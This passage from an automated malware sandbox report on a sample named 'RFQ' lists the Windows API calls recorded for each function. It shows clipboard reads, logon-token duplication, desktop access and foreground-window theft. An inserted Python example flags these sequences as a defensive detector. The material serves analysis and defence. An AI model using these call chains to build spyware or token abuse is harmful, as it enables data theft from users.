• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
  • Part of subcall function 006870E5: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0068AE0C,?,00008000), ref: 00687113
• GetLastError.KERNEL32(00000002,00000000), ref: 006F75FC
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: CreateErrorFileLast
• String ID:
• API String ID: 1214770103-0
APIs
• CloseHandle.KERNELBASE(?,?,00000000,006C306C), ref: 00687C0E
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 01717389
Memory Dump Source
• Source File: 00000000.00000002.1676907307.0000000001715000.00000040.00000020.00020000.00000000.sdmp, Offset: 01715000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1715000_RFQ.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
  • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0071950C
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071954D
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00719591
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007195BB
• SendMessageW.USER32 ref: 007195E4
• GetKeyState.USER32(00000011), ref: 0071967D
• GetKeyState.USER32(00000009), ref: 0071968A
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007196A0
• GetKeyState.USER32(00000010), ref: 007196AA
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007196DB
• SendMessageW.USER32 ref: 00719702
• SendMessageW.USER32(?,00001030,?,00717D85), ref: 0071980A
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00719820
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00719833
• SetCapture.USER32(?), ref: 0071983C
• ClientToScreen.USER32(?,?), ref: 007198A1
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007198AE
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007198C8
• ReleaseCapture.USER32 ref: 007198D3
• GetCursorPos.USER32(?), ref: 0071990B
• ScreenToClient.USER32(?,?), ref: 00719918
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00719972
• SendMessageW.USER32 ref: 007199A0
• SendMessageW.USER32(?,00001111,00000000,?), ref: 007199DD
• SendMessageW.USER32 ref: 00719A0C
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00719A2D
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 00719A3C
• GetCursorPos.USER32(?), ref: 00719A5A
• ScreenToClient.USER32(?,?), ref: 00719A67
• GetParent.USER32(?), ref: 00719A85
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00719AEC
• SendMessageW.USER32 ref: 00719B1D
• ClientToScreen.USER32(?,?), ref: 00719B76
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00719BA6
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00719BD0
• SendMessageW.USER32 ref: 00719BF3
• ClientToScreen.USER32(?,?), ref: 00719C40
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00719C74
  • Part of subcall function 0069ADC4: GetWindowLongW.USER32(?,000000EB), ref: 0069ADD2
• GetWindowLongW.USER32(?,000000F0), ref: 00719CF7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
• String ID: @GUI_DRAGID$F$p#u
• API String ID: 3429851547-3412459582
                                                                            • Opcode ID: 7827c60cba3b3138ed64af95f510e555d71fcdca931e3594dea839980f24e9b2
                                                                            • Instruction ID: f6e6c86d2cf3c36b11ca963d38a4b4073bddf103b7fea8a48fced9c45c3c708c
                                                                            • Opcode Fuzzy Hash: 7827c60cba3b3138ed64af95f510e555d71fcdca931e3594dea839980f24e9b2
                                                                            • Instruction Fuzzy Hash: 0D42DF70204200AFDB21CF68C854BEABBF6FF48310F148659F695972E1D779E892CB95
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00714828
                                                                            • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 0071483D
                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 0071485C
                                                                            • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00714880
                                                                            • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00714891
                                                                            • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 007148B0
                                                                            • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007148E3
                                                                            • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00714909
                                                                            • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00714944
                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 0071498B
                                                                            • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 007149B3
                                                                            • IsMenu.USER32(?), ref: 007149CC
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00714A27
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00714A55
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00714AC9
                                                                            • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00714B18
                                                                            • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00714BB7
                                                                            • wsprintfW.USER32 ref: 00714BE3
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00714BFE
                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00714C26
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00714C48
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00714C68
                                                                            • GetWindowTextW.USER32(?,00000000,00000001), ref: 00714C8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 4054740463-328681919
                                                                            • Opcode ID: 5bfe93b15ee942ff0e3cfae9e306cf13165e005564917626255ac19388782786
                                                                            • Instruction ID: 4d1614ad0eac257d9324c58c23046e82af0e14bc439da61659a99e1fca4891fa
                                                                            • Opcode Fuzzy Hash: 5bfe93b15ee942ff0e3cfae9e306cf13165e005564917626255ac19388782786
                                                                            • Instruction Fuzzy Hash: 0E121E71600214AFEB258F6CCC49FEE7BB9EF85710F108169F516EA2E0DB789981CB54
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0069EFB7
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0069EFD4
                                                                            • IsIconic.USER32(00000000), ref: 0069EFDD
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0069EFEF
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0069F005
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0069F00C
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0069F018
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0069F029
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0069F031
                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0069F039
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0069F03C
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0069F055
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0069F060
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0069F06A
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0069F06F
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0069F078
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0069F07D
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0069F087
                                                                            • keybd_event.USER32(00000012,00000000), ref: 0069F08C
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0069F08F
                                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0069F0AD
                                                                            • AttachThreadInput.USER32(?,00000000,00000000), ref: 0069F0B5
                                                                            • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 0069F0BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 1155518417-2988720461
                                                                            • Opcode ID: 6ed0d2089ac3ecd84679c33984f358ce1fc18353718aba75923724f6d0b8e229
                                                                            • Instruction ID: 553b6af95405a7ba921fafe275128d49a4cec3c583aaae4e58bf7d859c60c86b
                                                                            • Opcode Fuzzy Hash: 6ed0d2089ac3ecd84679c33984f358ce1fc18353718aba75923724f6d0b8e229
                                                                            • Instruction Fuzzy Hash: 6B317071A80218BEEF312BE94C4AFFF7E6DEB44B50F118026FA01F61D1C6B55D11AA64
                                                                            APIs
                                                                              • Part of subcall function 006E1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E1651
                                                                              • Part of subcall function 006E1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E167E
                                                                              • Part of subcall function 006E1607: GetLastError.KERNEL32 ref: 006E168E
                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 006E11CA
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 006E11EC
                                                                            • CloseHandle.KERNEL32(?), ref: 006E11FD
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006E1215
                                                                            • GetProcessWindowStation.USER32 ref: 006E122E
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 006E1238
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006E1254
                                                                              • Part of subcall function 006E1003: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E1140), ref: 006E1018
                                                                              • Part of subcall function 006E1003: CloseHandle.KERNEL32(?,?,006E1140), ref: 006E102D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                            • String ID: $default$winsta0
                                                                            • API String ID: 22674027-1027155976
                                                                            • Opcode ID: 931007e82b23c153c3dc739596fe5e4e99f995bc1db781512fa18e89654f165f
                                                                            • Instruction ID: 3389da78fff61ca24c8ad066b93c064bd60dcc44b8417cece7be3bc5602ddafe
                                                                            • Opcode Fuzzy Hash: 931007e82b23c153c3dc739596fe5e4e99f995bc1db781512fa18e89654f165f
                                                                            • Instruction Fuzzy Hash: 1981C2B1941349AFDF118FA9DC49FEEBBBAEF05300F148029F910EA290D7758A45DB24
                                                                            APIs
                                                                              • Part of subcall function 006E103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E1058
                                                                              • Part of subcall function 006E103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1064
                                                                              • Part of subcall function 006E103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E1073
                                                                              • Part of subcall function 006E103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006E0ADF,?,?,?), ref: 006E107A
                                                                              • Part of subcall function 006E103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E1091
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006E0B10
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006E0B44
                                                                            • GetLengthSid.ADVAPI32(?), ref: 006E0B5B
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 006E0B95
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006E0BB1
                                                                            • GetLengthSid.ADVAPI32(?), ref: 006E0BC8
                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 006E0BD0
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 006E0BD7
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006E0BF8
                                                                            • CopySid.ADVAPI32(00000000), ref: 006E0BFF
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006E0C2E
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006E0C50
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006E0C62
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0C89
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0C90
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0C99
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0CA0
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E0CA9
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0CB0
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 006E0CBC
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E0CC3
                                                                              • Part of subcall function 006E10D7: GetProcessHeap.KERNEL32(00000008,006E0AF5,?,00000000,?,006E0AF5,?), ref: 006E10E5
                                                                              • Part of subcall function 006E10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,006E0AF5,?), ref: 006E10EC
                                                                              • Part of subcall function 006E10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006E0AF5,?), ref: 006E10FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 4175595110-0
                                                                            • Opcode ID: b47fb3de4a7166ccbc6702fe9c20a1fc610d02d31d2575e133e2d07a1a64b910
                                                                            • Instruction ID: 149c77e7bc5fe6aedfb6e175e803b7c5bcf9eb9d23f3cb4976d36f91e537d841
                                                                            • Opcode Fuzzy Hash: b47fb3de4a7166ccbc6702fe9c20a1fc610d02d31d2575e133e2d07a1a64b910
                                                                            • Instruction Fuzzy Hash: 2B71BC72941349BBEB11CFA5DC49FEEBBB9BF04700F148215E905A6291D7B49A44CB60
                                                                            APIs
                                                                            • OpenClipboard.USER32(0071D0D0), ref: 006FEA50
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 006FEA5E
                                                                            • GetClipboardData.USER32(0000000D), ref: 006FEA6A
                                                                            • CloseClipboard.USER32 ref: 006FEA76
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006FEAAE
                                                                            • CloseClipboard.USER32 ref: 006FEAB8
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006FEAE3
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 006FEAF0
                                                                            • GetClipboardData.USER32(00000001), ref: 006FEAF8
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006FEB09
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006FEB49
                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 006FEB5F
                                                                            • GetClipboardData.USER32(0000000F), ref: 006FEB6B
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006FEB7C
                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 006FEB9E
                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006FEBBB
                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 006FEBF9
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006FEC1A
                                                                            • CountClipboardFormats.USER32 ref: 006FEC3B
                                                                            • CloseClipboard.USER32 ref: 006FEC80
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                            • String ID:
                                                                            • API String ID: 420908878-0
                                                                            • Opcode ID: 82a6f30b1d7e89449e07350aa2f7959bd959baea2cd30700da44fb8933ae22b1
                                                                            • Instruction ID: ca7f51493a228218f0c0a3a11c1f4e230dddbd2e0e36384a9edaff901c33a52d
                                                                            • Opcode Fuzzy Hash: 82a6f30b1d7e89449e07350aa2f7959bd959baea2cd30700da44fb8933ae22b1
                                                                            • Instruction Fuzzy Hash: 9061ED302443059FD311EF68C898FBA7BA6BF84704F04851DF996872E2CB76D905CB66
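The three records above (the GetForegroundWindow/AttachThreadInput/keybd_event/SetForegroundWindow sequence, the LogonUserW/DuplicateTokenEx/OpenWindowStationW/OpenDesktopW sequence, and the clipboard reads of CF_TEXT (1), CF_UNICODETEXT (0xD) and CF_HDROP (0xF)) are the kind of call chains an analyst wants to pick out of a report like this automatically. The following Python is an added example, not part of this report and not Joe Sandbox code: it parses "APIs" lists in the format shown on this page into per-function records and applies one rule per sequence. The rule names, the constructed sample excerpt and the choice of which calls a rule requires are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: call lines copied from the "APIs" records on this page,
# each record trimmed to the calls the rules below inspect. It is test input
# for the parser, not a complete record from the report.
SAMPLE_REPORT = """\
APIs
• GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0069EFB7
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0069EFD4
• GetCurrentThreadId.KERNEL32 ref: 0069F00C
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0069F029
• keybd_event.USER32(00000012,00000000), ref: 0069F060
• SetForegroundWindow.USER32(00000000), ref: 0069F08F
APIs
  • Part of subcall function 006E1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E1651
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 006E11CA
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 006E11EC
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006E1215
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006E1254
APIs
• OpenClipboard.USER32(0071D0D0), ref: 006FEA50
• IsClipboardFormatAvailable.USER32(0000000D), ref: 006FEA5E
• GetClipboardData.USER32(0000000D), ref: 006FEA6A
• GetClipboardData.USER32(0000000F), ref: 006FEB6B
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 006FEB9E
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 006F68DC
• FindClose.KERNEL32(00000000), ref: 006F6930
"""

# One bullet line: optional "Part of subcall function <addr>:" prefix,
# Name.MODULE, optional "(args)", then "ref: <addr>". Some lines (e.g.
# GetCurrentThreadId.KERNEL32 ref: ...) carry no argument list at all.
CALL_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str
    subcall: Optional[str]  # callee address when the line is "Part of subcall function"


def parse_records(text):
    """Split report text at each 'APIs' header and parse the bullets that follow
    into ApiCall objects; non-bullet lines (hashes, dump sources) are skipped."""
    records = []
    current = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            records.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = tuple(a.strip() for a in raw.split(",")) if raw else ()
            current.append(ApiCall(m.group("name"), m.group("module"), args,
                                   m.group("ref").upper(), m.group("sub")))
    return records


# Clipboard formats as they appear in the GetClipboardData arguments above.
CF_TEXT, CF_UNICODETEXT, CF_HDROP = "00000001", "0000000D", "0000000F"
VK_MENU = "00000012"  # ALT, the key keybd_event presses in the record above


def direct_names(record):
    """Names of calls made by the function itself (subcall lines excluded)."""
    return {c.name for c in record if c.subcall is None}


def rule_foreground_steal(record):
    """Attach to another thread's input queue, tap ALT, then SetForegroundWindow."""
    alt_tap = any(c.name == "keybd_event" and c.args[:1] == (VK_MENU,) for c in record)
    return {"AttachThreadInput", "SetForegroundWindow"} <= direct_names(record) and alt_tap


def rule_logon_token_desktop(record):
    """Logon token duplicated plus window station and desktop opened."""
    needed = {"LogonUserW", "DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"}
    return needed <= direct_names(record)


def rule_clipboard_read(record):
    """GetClipboardData for text, Unicode text or a dropped-file list."""
    formats = {c.args[0] for c in record if c.name == "GetClipboardData" and c.args}
    return bool(formats & {CF_TEXT, CF_UNICODETEXT, CF_HDROP})


RULES = {
    "foreground-steal": rule_foreground_steal,
    "logon-token-desktop": rule_logon_token_desktop,
    "clipboard-read": rule_clipboard_read,
}


def flag_records(records):
    """Map each rule name to the indexes of the records it fires on."""
    hits = {}
    for idx, record in enumerate(records):
        for rule_name, rule in RULES.items():
            if rule(record):
                hits.setdefault(rule_name, []).append(idx)
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for rule_name, idxs in flag_records(recs).items():
        for idx in idxs:
            refs = ", ".join(c.ref for c in recs[idx] if c.subcall is None)
            print(f"{rule_name}: record {idx} (refs {refs})")
```

Read the hits with the report's own caveat in mind: the signature list at the top says the binary is likely a compiled AutoIt script, so records like these are most plausibly the interpreter's library routines rather than code the script author wrote. A rule firing shows that the runtime carries the capability; whether this sample exercises it is what the behaviour signatures and the dumped process activity, not the static function listing, answer.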
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 006F68DC
                                                                            • FindClose.KERNEL32(00000000), ref: 006F6930
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006F696C
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006F6993
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 006F69D0
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 006F69FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                            • API String ID: 3830820486-3289030164
